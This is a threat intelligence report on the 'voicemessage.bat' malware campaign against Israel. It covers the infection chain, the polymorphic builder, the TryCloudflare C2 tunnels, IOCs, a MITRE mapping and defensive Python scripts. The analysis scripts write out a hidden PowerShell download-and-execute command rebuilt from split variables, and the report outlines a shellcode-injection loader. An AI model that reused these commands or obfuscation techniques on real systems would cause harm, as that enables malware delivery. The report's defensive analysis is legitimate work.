Operation VOICETRAP — FUD Batch File Campaign Targeting Israel via TryCloudflare Tunnels
TLP: WHITE Date: 2026-04-03 Analyst: GHOST (Breakglass Intelligence) Classification: Cybercrime — Commodity Malware Delivery Status: ACTIVE — Infrastructure live, 0/61 AV detection
Executive Summary
A fully undetectable (FUD) malware campaign is actively targeting victims in Israel using batch files disguised as voice messages ("voicemessage.bat"). The campaign uses an automated polymorphic builder that produces unique samples with randomized variable names, temp file paths, and junk padding while maintaining identical core functionality. Each sample embeds a legitimate M4A audio file as a decoy (played to the victim to sell the "voice message" cover story) while silently downloading and executing a PowerShell payload from Cloudflare's free TryCloudflare tunnel service. As of April 3, 2026, all three voicemessage.bat variants score zero detections on VirusTotal (0/60 and 0/61 engines), confirming the FUD claim.
A related but structurally distinct sample ("final.bat") from the same 24-hour window uses the same TryCloudflare delivery mechanism but employs a more sophisticated Python-based shellcode loader consistent with the SERPENTINE#CLOUD / VOID#GEIST campaign families documented by Securonix.
Key Findings
- Zero AV detections (0/60 and 0/61 engines) across all three voicemessage.bat variants — truly FUD
- Polymorphic builder producing unique hashes with identical payloads (same M4A decoy audio across all samples)
- Two distinct TryCloudflare tunnels used for C2: `old-entire-sequences-reactions` and `roger-conditioning-thriller-forms`
- Social engineering: Embedded M4A decoy audio opens in the media player to convince the victim the file is a real voice message
- Multi-stage attack: BAT -> VBScript (base64 decode M4A) -> VBScript (launch PowerShell) -> PS1 payload from TryCloudflare
- Tunnels still live as of April 3, 2026 (returning 403, likely filtering by User-Agent/headers)
- Related SERPENTINE#CLOUD variant (final.bat) uses Python encrypted shellcode loader injecting into explorer.exe
- roger-conditioning tunnel active since at least March 26, 2026 (per URLScan.io submission)
Campaign Scale (Expanded via VirusTotal Pivoting)
The initial 3 samples from MalwareBazaar were the tip of the iceberg. VirusTotal domain relationship pivoting on the roger-conditioning tunnel revealed at least 8 unique voicemessage.bat variants and 5 delivery archive ZIPs across a 7-day campaign window.
Full Campaign Timeline
| Timestamp (UTC) | File | SHA256 (truncated) | Size | Source |
|---|---|---|---|---|
| 2026-03-27 05:54 | voicemessage.bat | 5e306f54... | 50,518 | VT (roger-conditioning relation) |
| 2026-03-30 21:56 | voicemessage.bat | 294468f3... | 50,034 | VT (roger-conditioning relation) |
| 2026-03-30 22:45 | archive_voicemessage_295.zip | 70b122b2... | 50,498 | VT (roger-conditioning relation) |
| 2026-03-31 00:51 | archive_voicemessage_839.zip | b873de2b... | 50,080 | VT (roger-conditioning relation) |
| 2026-03-31 00:52 | voicemessage.bat | f1a0ad10... | 49,950 | VT (roger-conditioning relation) |
| 2026-03-31 01:24 | archive_voicemessage_768.zip | 23987773... | 48,821 | VT (roger-conditioning relation) |
| 2026-03-31 18:51 | archive0331.zip | c6316381... | 49,314 | VT (roger-conditioning relation) |
| 2026-03-31 19:36 | archive0331.zip | 2f1930f2... | 48,537 | VT (roger-conditioning relation) |
| 2026-04-02 11:26 | voicemessage.bat | 3877ef81... | 49,483 | MalwareBazaar (smica83) |
| 2026-04-02 12:48 | voicemessage.bat | 9a5af44a... | 49,184 | MalwareBazaar (smica83) |
| 2026-04-02 12:49 | voicemessage.bat | 2bedd77c... | 48,407 | MalwareBazaar (smica83) |
| 2026-04-02 13:37 | final.bat (Builder B) | ea4043b0... | 7,512 | MalwareBazaar (pr0xylife) |
Delivery Packaging Patterns
- `archive_voicemessage_NNN.zip`: random 3-digit suffix, contains a single voicemessage.bat
- `archive0331.zip`: date-stamped (March 31), contains a single voicemessage.bat
- All ZIPs carry VT sandbox tags flagging anti-analysis behaviour
Campaign Operational Tempo
- Day 1 (Mar 27): Single sample — possible test/initial deployment
- Day 4-5 (Mar 30-31): Burst of 7 samples/archives — full operational deployment
- Day 7 (Apr 2): 3 new variants + C2 tunnel rotation (old-entire added alongside roger-conditioning) — campaign evolution
Attack Chain
```text
[Email/Messaging Delivery]
            |
     voicemessage.bat
            |
       +----+----+
       |         |
   VBScript   VBScript
   (decode)   (download)
       |         |
  M4A decoy   PowerShell -WindowStyle Hidden
  (opens in   (Invoke-WebRequest | IEX)
   media           |
   player)    TryCloudflare tunnel
              /fp.ps1 or /out
                   |
            [STAGE 2 PAYLOAD]
            (PS1 not yet recovered;
             tunnels return 403)
```
Infrastructure Analysis
TryCloudflare Tunnels (C2 Delivery)
| Tunnel Subdomain | Path | Resolves To | Status | First Seen |
|---|---|---|---|---|
| old-entire-sequences-reactions[.]trycloudflare[.]com | /out | 104.16.230[.]132, 104.16.231[.]132 | LIVE (403) | 2026-04-02 |
| roger-conditioning-thriller-forms[.]trycloudflare[.]com | /fp.ps1 | 104.16.230[.]132, 104.16.231[.]132 | LIVE (403) | 2026-03-26 |
| requires-fortune-nutten-eligible[.]trycloudflare[.]com | /files.zip, /add_to_startup.bat | 104.16.230[.]132, 104.16.231[.]132 | Resolving (HTTP status not checked) | 2026-04-02 |
Note: All tunnels resolve to Cloudflare anycast IPs (AS13335). The actual origin server is hidden behind Cloudflare's infrastructure. TryCloudflare tunnels are ephemeral — the actor runs cloudflared tunnel on their machine and gets a random subdomain. No registration, no payment, no attribution trail through Cloudflare.
VirusTotal Domain Reputation
| Domain | Malicious | Suspicious | Harmless | Undetected |
|---|---|---|---|---|
| old-entire-sequences-reactions[.]trycloudflare[.]com | 1 (CRDF) | 3 | 60 | 30 |
| roger-conditioning-thriller-forms[.]trycloudflare[.]com | 0 | 0 | 62 | 32 |
Malware Analysis
Builder A — "voicemessage.bat" (Polymorphic FUD Builder)
Sample Inventory
| SHA256 | Size | C2 Tunnel | Reporter | First Seen | VT Detection |
|---|---|---|---|---|---|
| 2bedd77cc5402b2a151ae4f4d9743dbdd12d6368ac16dcf86678bd185315957e | 48,407 | roger-conditioning | smica83 | 2026-04-02 12:49 | 0/60 |
| 9a5af44af5dcf614cecb9d6a14f1412e6e59355b980dd1c28325aa3c31de24a1 | 49,184 | roger-conditioning | smica83 | 2026-04-02 12:48 | 0/60 |
| 3877ef81288520aca410885207b0647c79955655adb023a0c50df0255a8e8b00 | 49,483 | old-entire-sequences | smica83 | 2026-04-02 11:26 | 0/61 |
Polymorphic Characteristics
The builder randomizes the following per-sample while keeping the functional payload identical:
- Temp file names: random alphanumeric strings (e.g., `SekEecP837`, `KOZrGsfmoZa943`, `iOqkBWPbyGL567`)
- Variable name suffixes: random suffixes on the `lnk_N_SUFFIX` and `dlcmd_N_SUFFIX` variables
- Junk padding: `REM` and `::` comment lines with random strings inserted between functional lines (82-96 junk lines per sample)
- Line count: varies (622-632 lines) with the random junk insertion
- File size: varies (48-49 KB) accordingly
The embedded M4A decoy audio is byte-for-byte identical across all three samples (MD5: 5f630161ae03098ac692ebbefa14d539, SHA256: d11d8bc2f78520fb6b7bb7d3173597787654a56faa51768246fdd76143046fce, 21,636 bytes).
Execution Flow (Confirmed by CAPE Sandbox)
1. `@echo off` + `setlocal ENABLEDELAYEDEXPANSION` + `chcp 65001` (UTF-8 codepage)
2. Display message: "Preparing to decode audiomessage"
3. Reconstruct the TryCloudflare URL from ~15 split variables (`lnk_0` through `lnk_14`)
4. Reconstruct the full PowerShell download command from ~52 split variables (`dlcmd_0` through `dlcmd_51`)
5. Write the base64-encoded M4A audio to `%TEMP%\[random].b64` (401 echo lines)
6. Generate VBScript #1: decode base64 to an M4A file using MSXML2.DOMDocument + ADODB.Stream
7. Execute VBScript #1 via `cscript //nologo`
8. Generate VBScript #2: execute the reconstructed PowerShell command via `WScript.Shell.Run` with visibility=0 (hidden)
9. Execute VBScript #2 via `cscript //nologo`
10. Open the decoded M4A file via `start ""` (launches the default media player; Zune/Groove Music in the sandbox)
The victim sees a media player open and hears audio, believing the "voice message" is real. Meanwhile, PowerShell silently downloads and executes the Stage 2 payload from the TryCloudflare tunnel.
Obfuscation Technique — Variable Splitting
The C2 URL and PowerShell command are split across dozens of individually-set environment variables, then reassembled using delayed expansion (!var!). Example reconstruction:
```bat
set "lnk_0=https"
set "lnk_1=://ol"
set "lnk_2=d-"
...
set "ps1_url=!lnk_0!!lnk_1!!lnk_2!..."
```
This defeats naive static string matching (no complete URL and no contiguous PowerShell command line appears in the file) while remaining trivially reversible: replaying the `set` lines in order with delayed expansion recovers the URL and the command.
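The execution flow and the variable-splitting scheme above are mechanical enough to reverse automatically. The following is an added example (written for this report, not code from the campaign or from any referenced vendor) that replays the `set` lines of a batch file with delayed-expansion semantics, counts the junk padding, reassembles any `lnk_N_`/`dlcmd_N_` fragments, decodes the echoed base64 blob and checks it for the M4A `ftyp` signature. It runs on a constructed stand-in sample built inside the script; the tunnel hostname, the variable suffix `q7x` and the 28-byte decoy header are made up and are not campaign indicators.

```python
import base64
import re

# Constructed stand-in for a voicemessage.bat sample, NOT a real campaign sample:
# same structure as described above (junk REM/:: lines, URL and PowerShell command
# split across lnk_N_<suffix>/dlcmd_N_<suffix> variables, delayed-expansion
# reassembly, base64 decoy echoed into %TEMP%). Hostname, suffix and decoy are made up.
DECOY_HEADER = bytes.fromhex(
    "0000001c" "66747970" "4d344120" "00000000" "4d344120" "6d703432" "69736f6d"
)  # a lone 28-byte 'ftyp' box, major brand 'M4A '

def build_sample() -> str:
    b64 = base64.b64encode(DECOY_HEADER).decode()
    echo_lines = "\n".join(f'echo {b64[i:i + 16]} >>"!b64file!"' for i in range(0, len(b64), 16))
    return f'''@echo off
setlocal ENABLEDELAYEDEXPANSION
chcp 65001 >nul
REM kz9Qw3 padding line
echo Preparing to decode audiomessage
set "lnk_0_q7x=https"
:: 7Hs2pL padding line
set "lnk_1_q7x=://ex"
set "lnk_2_q7x=ample-words-tunnel.trycl"
set "lnk_3_q7x=oudflare.com/fp.ps1"
set "ps1_url=!lnk_0_q7x!!lnk_1_q7x!!lnk_2_q7x!!lnk_3_q7x!"
set "dlcmd_0_q7x=powershell -Window"
set "dlcmd_1_q7x=Style Hidden -Nologo -Execut"
set "dlcmd_2_q7x=ionPolicy Bypass -Command I"
set "dlcmd_3_q7x=EX (Invoke-WebRequest '!ps1_url!' -UseBasicParsing).Content"
set "fullcmd=!dlcmd_0_q7x!!dlcmd_1_q7x!!dlcmd_2_q7x!!dlcmd_3_q7x!"
set "b64file=%TEMP%\\SekEecP837.b64"
{echo_lines}
'''

SET_RE = re.compile(r'^\s*set\s+"([^=]+)=(.*)"\s*$', re.IGNORECASE)
JUNK_RE = re.compile(r'^\s*(?:rem\b|::)', re.IGNORECASE)
ECHO_B64_RE = re.compile(r'^\s*echo\s+([A-Za-z0-9+/=]{4,})\s*>>', re.IGNORECASE)
SPLIT_VAR_RE = re.compile(r'^(?:lnk|dlcmd)_\d+(?:_\w+)?$', re.IGNORECASE)
DELAYED_RE = re.compile(r'!([^!\s]+)!')

def resolve_sets(lines):
    """Replay `set "name=value"` lines in order, expanding !name! references the
    way cmd.exe does under ENABLEDELAYEDEXPANSION (when that line executes)."""
    env = {}
    for line in lines:
        m = SET_RE.match(line)
        if m:
            name, raw = m.group(1), m.group(2)
            env[name] = DELAYED_RE.sub(lambda r: env.get(r.group(1), r.group(0)), raw)
    return env

def analyze(text):
    lines = text.splitlines()
    junk = [ln for ln in lines if JUNK_RE.match(ln)]
    env = resolve_sets(lines)
    split_vars = {k for k in env if SPLIT_VAR_RE.match(k)}
    # Only fully reassembled values (not the fragments themselves) are reported.
    urls = [v for k, v in env.items() if k not in split_vars and re.match(r"https?://", v)]
    cmds = [v for k, v in env.items() if k not in split_vars and v.lower().startswith("powershell")]
    b64 = "".join(m.group(1) for m in map(ECHO_B64_RE.match, lines) if m)
    decoy = base64.b64decode(b64) if b64 else b""
    return {
        "junk_lines": len(junk),
        "split_vars": len(split_vars),
        "urls": urls,
        "commands": cmds,
        "decoy_bytes": len(decoy),
        "indicators": {
            "console_banner": "Preparing to decode audiomessage" in text,
            "split_variables": bool(split_vars),
            "trycloudflare_url": any("trycloudflare.com" in u for u in urls),
            "hidden_powershell": any("-windowstyle hidden" in c.lower() for c in cmds),
            "embedded_m4a": decoy[4:8] == b"ftyp",   # ISO BMFF: bytes 4-7 of the first box
        },
    }

if __name__ == "__main__":
    for key, value in analyze(build_sample()).items():
        print(f"{key}: {value}")
```

Against a real sample the same replay yields the complete tunnel URL and the full PowerShell command line before the file ever executes, which is what a static triage or a YARA pre-filter should key on; the junk-line count and split-variable count are useful builder fingerprints in their own right.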
Builder B — "final.bat" (SERPENTINE#CLOUD Variant)
| SHA256 | Size | Reporter | First Seen | Signature |
|---|---|---|---|---|
| ea4043b07992e4aefb3e15b2ef3ddd71de315109c01b4230585cc213ab6ec3dd | 7,512 | pr0xylife | 2026-04-02 13:37 | None |
This is a structurally different and more advanced builder:
- Downloads the Python 3.11.8 embedded distribution
- Installs pip, psutil, cryptography, pyaes
- Downloads `files.zip` (containing `encrypted_loader.py`, `as_encrypted.bin`, `as_key.bin`)
- Downloads `add_to_startup.bat` for persistence
- Runs: `python encrypted_loader.py -f as_encrypted.bin explorer.exe`
- Key file: `as_key.bin` (expected 48 bytes = 32-byte AES key + 16-byte IV)
- Injection target: `explorer.exe` (process injection)
- Install path: `%APPDATA%\Microsoft\Windows\Crypto\RSA\Cache` (blends with the legitimate Windows crypto cache)
This matches the SERPENTINE#CLOUD / VOID#GEIST campaign family documented by Securonix (2025-2026).
Decoy Audio Analysis
| Property | Value |
|---|---|
| File Type | M4A (MPEG-4 Audio, ftyp brand: M4A) |
| Size | 21,636 bytes (~21 KB) |
| SHA256 | d11d8bc2f78520fb6b7bb7d3173597787654a56faa51768246fdd76143046fce |
| MD5 | 5f630161ae03098ac692ebbefa14d539 |
| Duration | ~2-3 seconds (estimated from file size) |
The small size suggests a very short audio clip — possibly a brief "hello" or generic greeting, enough to seem legitimate for a voice message notification.
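The duration in the table is an inference from file size; the M4A container carries the real value in its `mvhd` box (timescale and duration), and the `ftyp` box carries the brand reported above. The following is an added example for this report (not the campaign's decoy and not vendor code) that walks the ISO BMFF box structure, handling the 64-bit `largesize` and size-0 forms and rejecting truncated boxes, and runs over a minimal M4A constructed inline with a made-up 44.1 kHz timescale and 118000-unit duration.

```python
import struct

# MP4/M4A box types whose payload is itself a sequence of boxes.
CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"stbl", b"udta"}

def iter_boxes(buf, start=0, end=None):
    """Yield (type, payload_start, box_end) for each box in buf[start:end],
    honouring the 64-bit 'largesize' form (size==1) and size==0 (to end of data)."""
    end = len(buf) if end is None else end
    off = start
    while off + 8 <= end:
        size, kind = struct.unpack_from(">I4s", buf, off)
        hdr = 8
        if size == 1:
            if off + 16 > end:
                raise ValueError(f"truncated largesize header at offset {off}")
            size, = struct.unpack_from(">Q", buf, off + 8)
            hdr = 16
        elif size == 0:
            size = end - off
        if size < hdr or off + size > end:
            raise ValueError(f"malformed {kind!r} box at offset {off}")
        yield kind, off + hdr, off + size
        off += size

def parse_mvhd(buf, start):
    """Return (timescale, duration) from a Movie Header box payload."""
    version = buf[start]
    if version == 0:   # 32-bit creation/modification/timescale/duration
        _, _, timescale, duration = struct.unpack_from(">IIII", buf, start + 4)
    else:              # version 1: 64-bit times and duration, 32-bit timescale
        _, _, timescale, duration = struct.unpack_from(">QQIQ", buf, start + 4)
    return timescale, duration

def describe_m4a(buf):
    info = {"major_brand": None, "compatible_brands": [], "timescale": None,
            "duration_units": None, "duration_s": None, "has_mdat": False}
    def walk(start, end):
        for kind, ps, pe in iter_boxes(buf, start, end):
            if kind == b"ftyp":
                info["major_brand"] = buf[ps:ps + 4].decode("latin-1")
                info["compatible_brands"] = [buf[i:i + 4].decode("latin-1")
                                             for i in range(ps + 8, pe - 3, 4)]
            elif kind == b"mvhd":
                ts, dur = parse_mvhd(buf, ps)
                info.update(timescale=ts, duration_units=dur,
                            duration_s=(dur / ts if ts else None))
            elif kind == b"mdat":
                info["has_mdat"] = True
            elif kind in CONTAINERS:
                walk(ps, pe)
    walk(0, len(buf))
    return info

def box(kind, payload):
    return struct.pack(">I", 8 + len(payload)) + kind + payload

# Constructed minimal M4A (not the campaign's decoy): ftyp + moov/mvhd + empty mdat.
MVHD = (bytes(4)                                    # version 0, flags
        + struct.pack(">IIII", 0, 0, 44100, 118000)  # creation, modification, timescale, duration
        + struct.pack(">IH", 0x00010000, 0x0100)     # rate 1.0, volume 1.0
        + bytes(10) + bytes(36) + bytes(24)          # reserved, matrix, pre_defined
        + struct.pack(">I", 2))                      # next_track_ID
SAMPLE_M4A = (box(b"ftyp", b"M4A " + bytes(4) + b"M4A mp42isom")
              + box(b"moov", box(b"mvhd", MVHD))
              + box(b"mdat", bytes(16)))

if __name__ == "__main__":
    print(describe_m4a(SAMPLE_M4A))
```

Run against the decoded decoy from a real sample, `duration_s` replaces the size-based estimate, and a decoy whose `ftyp` brand or box chain does not parse is itself worth noting, since the builder embeds the file unchanged.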
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Application |
|---|---|---|---|
| Initial Access | Phishing: Spearphishing Link | T1566.002 | voicemessage.bat delivered via link (vector inferred, not confirmed; an attachment would map to T1566.001) |
| Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 | BAT file execution |
| Execution | Command and Scripting Interpreter: Visual Basic | T1059.005 | VBScript for base64 decode + PS launch |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | PowerShell IEX from C2 |
| Defense Evasion | Obfuscated Files or Information | T1027 | Variable splitting, junk padding |
| Defense Evasion | Deobfuscate/Decode Files or Information | T1140 | Base64-encoded M4A decoy |
| Defense Evasion | Masquerading | T1036 | voicemessage.bat poses as audio file |
| Defense Evasion | Hide Artifacts: Hidden Window | T1564.003 | PowerShell -WindowStyle Hidden |
| Command and Control | Ingress Tool Transfer | T1105 | PS1 download from TryCloudflare |
| Command and Control | Proxy: External Proxy | T1090.002 | TryCloudflare as C2 proxy |
| Resource Development | Acquire Infrastructure: Web Services | T1583.006 | Free TryCloudflare tunnel service |
Threat Actor Profile
Attribution Assessment
- Confidence: LOW
- Evidence: Limited — samples submitted by smica83 with "from Israel" context, but no direct actor artifacts recovered
- Motivation: Unknown — Stage 2 payload not recovered (tunnels return 403)
- Builder sophistication: MEDIUM — polymorphic randomization is automated but obfuscation technique (variable splitting) is elementary
- Campaign maturity: The roger-conditioning tunnel has been active since at least March 26 (8+ days), suggesting operational patience
Possible Campaign Links
- SERPENTINE#CLOUD: The final.bat sample (Builder B) is consistent with SERPENTINE#CLOUD TTPs documented by Securonix — Python-based encrypted shellcode loader, TryCloudflare delivery, AES-encrypted payloads
- VOID#GEIST: Securonix's March 2026 follow-up campaign documenting multi-stage Python loaders delivering XWorm, AsyncRAT, and XenoRAT
- The voicemessage.bat (Builder A) may be a NEW builder variant from the same operators or an independent actor using the same TryCloudflare playbook
IOC Summary
Network Indicators
- old-entire-sequences-reactions[.]trycloudflare[.]com
- roger-conditioning-thriller-forms[.]trycloudflare[.]com
- requires-fortune-nutten-eligible[.]trycloudflare[.]com
- 104.16.230[.]132 (Cloudflare anycast — shared infrastructure, not specific to the actor)
- 104.16.231[.]132 (Cloudflare anycast — shared infrastructure, not specific to the actor)
File Indicators
| Hash Type | Value | File |
|---|---|---|
| SHA256 | 2bedd77cc5402b2a151ae4f4d9743dbdd12d6368ac16dcf86678bd185315957e | voicemessage.bat (sample 1) |
| SHA256 | 9a5af44af5dcf614cecb9d6a14f1412e6e59355b980dd1c28325aa3c31de24a1 | voicemessage.bat (sample 2) |
| SHA256 | 3877ef81288520aca410885207b0647c79955655adb023a0c50df0255a8e8b00 | voicemessage.bat (sample 3) |
| SHA256 | ea4043b07992e4aefb3e15b2ef3ddd71de315109c01b4230585cc213ab6ec3dd | final.bat (SERPENTINE#CLOUD variant) |
| SHA256 | d11d8bc2f78520fb6b7bb7d3173597787654a56faa51768246fdd76143046fce | Embedded M4A decoy audio |
| MD5 | a9bd78eea829facf9068c600560a686c | voicemessage.bat (sample 1) |
| MD5 | ab7e6e76ea30a31a67f6f143b954cd78 | voicemessage.bat (sample 2) |
| MD5 | 2e59f7cbe7ad23fbae276cda57b3ad90 | voicemessage.bat (sample 3) |
| MD5 | 8f3a7333507cdb65756661088a50cae0 | final.bat |
| TLSH | T10E23A6F3A09E04D509EB47700E2AB509FF54867BD10CD827684699B79B3D3D97A0F0EA | voicemessage.bat (sample 1) |
| TLSH | T12E23F9FB609DAA05C9A74B6C0F18C985FF64C07B81805A174647267503BE3F57A8FBCA | voicemessage.bat (sample 2) |
| TLSH | T1B823C7F3639E06158C2B4A6C1E9D8127FF44C06BC11A681774BE147B4A3E2D5EABF1C9 | voicemessage.bat (sample 3) |
| ssdeep | 768:t7Ek1Uy3ImODcmyar4bLwH3m7nRpq5CD91B6B/c6H:tVOZyaEUWvaCD91ScW | voicemessage.bat (sample 1) |
Behavioral Indicators
- Temp files: `%TEMP%\[random].b64`, `%TEMP%\[random].vbs`, `%TEMP%\[random].m4a`
- Console message: "Preparing to decode audiomessage"
- Variable pattern: `set "lnk_N_[random]=..."` and `set "dlcmd_N_[random]=..."`
- PowerShell flags: `-WindowStyle Hidden -Nologo -ExecutionPolicy Bypass`
- VBScript using MSXML2.DOMDocument for base64 decode
- ADODB.Stream for binary file write
- Install path (Builder B): `%APPDATA%\Microsoft\Windows\Crypto\RSA\Cache\`
- Persistence script (Builder B): `add_to_startup.bat`
- Payload files (Builder B): `encrypted_loader.py`, `as_encrypted.bin`, `as_key.bin`
Recommended Actions
Immediate (24-48 hours)
- Block the TryCloudflare tunnel subdomains at proxy/DNS level (or block `trycloudflare.com` entirely if it is not in business use)
- Deploy YARA rules keyed on the builder artifacts listed under Behavioral Indicators (console banner, `lnk_N_`/`dlcmd_N_` variable pattern, embedded base64 M4A) to detect voicemessage.bat variants
- Monitor for `.bat` files containing "Preparing to decode audiomessage" or the `lnk_N_`/`dlcmd_N_` variable pattern
- Submit the tunnel URLs to Cloudflare abuse reporting
Short-term (1-2 weeks)
- Hunt for additional Builder A variants using ssdeep/TLSH fuzzy matching on MalwareBazaar
- Monitor for new TryCloudflare subdomains in CT logs delivering similar payloads
- Investigate whether Stage 2 PS1 payload can be recovered via sandbox re-submission with different network conditions
Medium-term (1-3 months)
- Develop detection for the VBScript->PowerShell->IEX chain via endpoint telemetry
- Correlate with SERPENTINE#CLOUD / VOID#GEIST infrastructure for campaign overlap
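The VBScript->PowerShell->IEX chain is visible in process-creation telemetry as cmd.exe (running a .bat) spawning cscript.exe, which in turn spawns a hidden PowerShell that downloads and evaluates a script. The following is an added example for this report (not vendor detection content) that scores each PowerShell launch on its ancestry and command line; it runs over constructed process events that mimic Sysmon Event ID 1 fields (pid, parent pid, image, command line). The paths, pids and tunnel hostname are made up.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 / EDR telemetry carry)."""
    pid: int
    ppid: int
    image: str      # full image path
    cmdline: str

# Constructed telemetry, not real sensor output: one VOICETRAP-style chain
# (pids 4100-4140) plus two benign PowerShell launches. Paths and tunnel name are made up.
EVENTS = [
    ProcEvent(4000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4100, 4000, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\dana\Downloads\voicemessage.bat"'),
    ProcEvent(4120, 4100, r"C:\Windows\System32\cscript.exe",
              r"cscript //nologo C:\Users\dana\AppData\Local\Temp\KOZrGsfmoZa943.vbs"),
    ProcEvent(4140, 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -WindowStyle Hidden -Nologo -ExecutionPolicy Bypass -Command IEX "
              "(Invoke-WebRequest 'https://example-words-tunnel.trycloudflare.com/fp.ps1' -UseBasicParsing).Content"),
    ProcEvent(5000, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -NoProfile -File C:\ops\backup.ps1"),
    ProcEvent(5100, 4000, r"C:\Windows\System32\cscript.exe", r"cscript //nologo C:\ops\logon.vbs"),
    ProcEvent(5110, 5100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -Command Get-Date"),
]

HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
FETCH_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient", re.I)
TUNNEL_RE = re.compile(r"https?://[\w.-]+\.trycloudflare\.com\S*", re.I)
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def lineage(idx: Dict[int, ProcEvent], pid: int, limit: int = 8) -> List[ProcEvent]:
    """Process and its ancestors, leaf first, bounded so a pid loop cannot spin."""
    chain = []
    while pid in idx and len(chain) < limit:
        chain.append(idx[pid])
        pid = idx[pid].ppid
    return chain

def score_event(e: ProcEvent, idx: Dict[int, ProcEvent]) -> dict:
    reasons = []
    chain = lineage(idx, e.pid)
    parent = chain[1] if len(chain) > 1 else None
    if parent and basename(parent.image) in SCRIPT_HOSTS:
        reasons.append("PowerShell spawned by Windows Script Host")
    if any(basename(a.image) == "cmd.exe" and ".bat" in a.cmdline.lower() for a in chain[1:]):
        reasons.append("batch file in ancestry")
    if HIDDEN_RE.search(e.cmdline):
        reasons.append("hidden window")
    if IEX_RE.search(e.cmdline) and FETCH_RE.search(e.cmdline):
        reasons.append("download-and-execute (IEX)")
    m = TUNNEL_RE.search(e.cmdline)
    if m:
        reasons.append(f"TryCloudflare URL {m.group(0)}")
    return {"pid": e.pid, "score": len(reasons), "reasons": reasons,
            "chain": " -> ".join(basename(p.image) for p in reversed(chain))}

def detect(events: List[ProcEvent], threshold: int = 3) -> List[dict]:
    """Alert on PowerShell launches whose score reaches the threshold."""
    idx = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if basename(e.image) in {"powershell.exe", "pwsh.exe"}:
            result = score_event(e, idx)
            if result["score"] >= threshold:
                alerts.append(result)
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["chain"], alert["score"], alert["reasons"])
```

The threshold keeps an administrator's `cscript`-launched PowerShell (one weak signal) below the alert line while the campaign chain trips every clause; the tunnel regex is the only indicator-specific clause, so the rule keeps firing after the actor rotates subdomains.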
References
- Securonix: Analyzing SERPENTINE#CLOUD
- Securonix: VOID#GEIST Multi-Stage Python Loader
- Proofpoint: Threat Actor Abuses Cloudflare Tunnels to Deliver RATs
- The Hacker News: AsyncRAT Campaign Uses Python Payloads and TryCloudflare Tunnels
- MalwareBazaar: voicemessage.bat submissions by smica83
- URLScan.io: roger-conditioning-thriller-forms scan
GHOST — Breakglass Intelligence "One indicator. Total infrastructure."